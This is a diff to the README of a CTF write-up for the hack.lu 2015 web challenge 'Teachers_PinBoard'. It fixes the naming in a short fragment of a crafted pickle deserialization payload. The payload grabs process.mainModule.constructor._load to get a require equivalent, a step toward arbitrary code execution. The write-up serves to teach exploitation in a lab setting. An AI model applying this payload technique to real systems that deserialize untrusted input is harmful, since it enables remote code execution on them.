ctfs/write-ups-2015/hacklu-ctf-2015/web/Teachers_PinBoard/README.md

 "c"+ // GLOBAL
 "global\n"+ //moduleName
 "global\n"+ //name
-"S'rediuce'\n"+ // push arbitrary String 'rediuce'
+"S'rekire'\n"+ // push arbitrary String 'rekire'
 "c"+ // GLOBAL
 "b\n"+ //moduleName
 "_load\n"+ //name
-// now we got [`this`, 'rediuce', `process.mainModule.constructor._load`] "s" // SETITEM
+// now we got [`this`, 'rekire', `process.mainModule.constructor._load`] "s" // SETITEM
 ```

-We have an equivalent of the `reduce` function directly callable from `this.rediuce`, so now we can `require` any library and use the same technique to retrieve any function.
+We have an equivalent of the `require` function directly callable from `this.rekire`, so now we can `require` any library and use the same technique to retrieve any function.

 ```
 pickle += ""+